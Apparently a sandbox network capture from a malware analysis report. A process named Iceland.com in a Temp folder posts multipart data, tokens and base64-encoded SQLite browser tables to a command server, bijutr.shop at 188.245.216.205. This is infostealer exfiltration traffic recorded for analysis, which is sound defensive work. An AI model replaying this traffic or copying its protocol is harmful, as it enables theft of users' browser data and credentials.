                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 38 30 30 30 0d 0a 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 79 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c
                                                                                                                                                                                                                                                              Data Ascii: 8000dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener(c,d,!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpException(e)}\ntry{\nvar yd\u003ddocument.querySelector(\
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 61 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 47 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 47 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 46 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 4c 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4c 64 28 5f 2e 48 64 3f 5f 2e 48 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70
                                                                                                                                                                                                                                                              Data Ascii: a\"),Gd(\"http\"),Gd(\"https\"),Gd(\"mailto\"),Gd(\"ftp\"),new _.Fd(a\u003d\u003e/^[^:]*([/?#]|$)/.test(a))];_.Ld\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};_.Md\u003dnew _.Ld(_.Hd?_.Hd.emptyHTML:\"\");\n}catch(e){_._DumpExcep
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 4d 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 73 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                              Data Ascii: ute(\"nonce\")||\"\"};\n_.$d\u003dfunction(a){var b\u003d_.Ma(a);return b\u003d\u003d\"array\"||b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.ae\u003dfunction(a,b,c){return _.sb(a,b,c,!1)!\u003d\u003dvoid 0};_.be\u003dfunctio


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49754 | 172.217.21.36 | 443 | 3844 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:46 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-12-27 06:09:47 UTC | 933 | IN | HTTP/1.1 200 OK
Version: 705503573
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Date: Fri, 27 Dec 2024 06:09:47 GMT
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2024-12-27 06:09:47 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-27 06:09:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49764 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:50 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDTJW4E37YCBIEU37YUA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 505
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:09:50 UTC | 505 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 48 44 54 4a 57 34 45 33 37 59 43 42 49 45 55 33 37 59 55 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 54 4a 57 34 45 33 37 59 43 42 49 45 55 33 37 59 55 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 54 4a 57 34 45 33 37 59 43 42 49 45 55 33 37 59 55 41 0d 0a 43 6f 6e 74
Data Ascii: ------HDTJW4E37YCBIEU37YUAContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------HDTJW4E37YCBIEU37YUAContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------HDTJW4E37YCBIEU37YUACont
2024-12-27 06:09:52 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:09:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:09:52 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49766 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:52 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----V3790H47GVAIE3W47YUS
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 213453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:09:52 UTC | 16355 | OUT | Data Ascii:
------V3790H47GVAIE3W47YUS
Content-Disposition: form-data; name="token"

d6efe9e6f5b734065d29d7e36ae274f3
------V3790H47GVAIE3W47YUS
Content-Disposition: form-data; name="build_id"

b8863efc59880a6372f9765b67beadc3
------V3790H47GVAIE3W47YUS
Cont
2024-12-27 06:09:54 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:09:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49767 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:54 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----VAIM7GLFCBIE3EUS00HL
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:09:54 UTC | 16355 | OUT | Data Ascii:
------VAIM7GLFCBIE3EUS00HL
Content-Disposition: form-data; name="token"

d6efe9e6f5b734065d29d7e36ae274f3
------VAIM7GLFCBIE3EUS00HL
Content-Disposition: form-data; name="build_id"

b8863efc59880a6372f9765b67beadc3
------VAIM7GLFCBIE3EUS00HL
Cont
2024-12-27 06:09:56 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:09:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:09:56 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49768 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:56 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----5PZCTJEC2VAAAAIE3W47
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:09:56 UTC | 16355 | OUT | Data Ascii: ------5PZCTJEC2VAAAAIE3W47Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------5PZCTJEC2VAAAAIE3W47Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------5PZCTJEC2VAAAAIE3W47Cont
2024-12-27 06:09:58 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:09:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:09:58 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49769 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:58 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----I58QQIWLXBIM7Y5P8Q9R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 493
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:09:58 UTC | 493 | OUT | Data Ascii: ------I58QQIWLXBIM7Y5P8Q9RContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------I58QQIWLXBIM7Y5P8Q9RContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------I58QQIWLXBIM7Y5P8Q9RCont
2024-12-27 06:09:59 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:09:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:09:59 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49771 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:00 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JMOPHD2DTRQIM7Q16X47
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 169765
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:00 UTC | 16355 | OUT | Data Ascii: ------JMOPHD2DTRQIM7Q16X47Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------JMOPHD2DTRQIM7Q16X47Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------JMOPHD2DTRQIM7Q16X47Cont
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-27 06:10:00 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                                                                                                                                                                                              Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
2024-12-27 06:10:02 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49772 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:01 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----PHVAI5F3EKF37QQQI5XL
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 66001
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:03 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:03 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49782 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:04 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CJW47QI5FCBAIMGLN7YU
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 153381
Connection: Keep-Alive
Cache-Control: no-cache
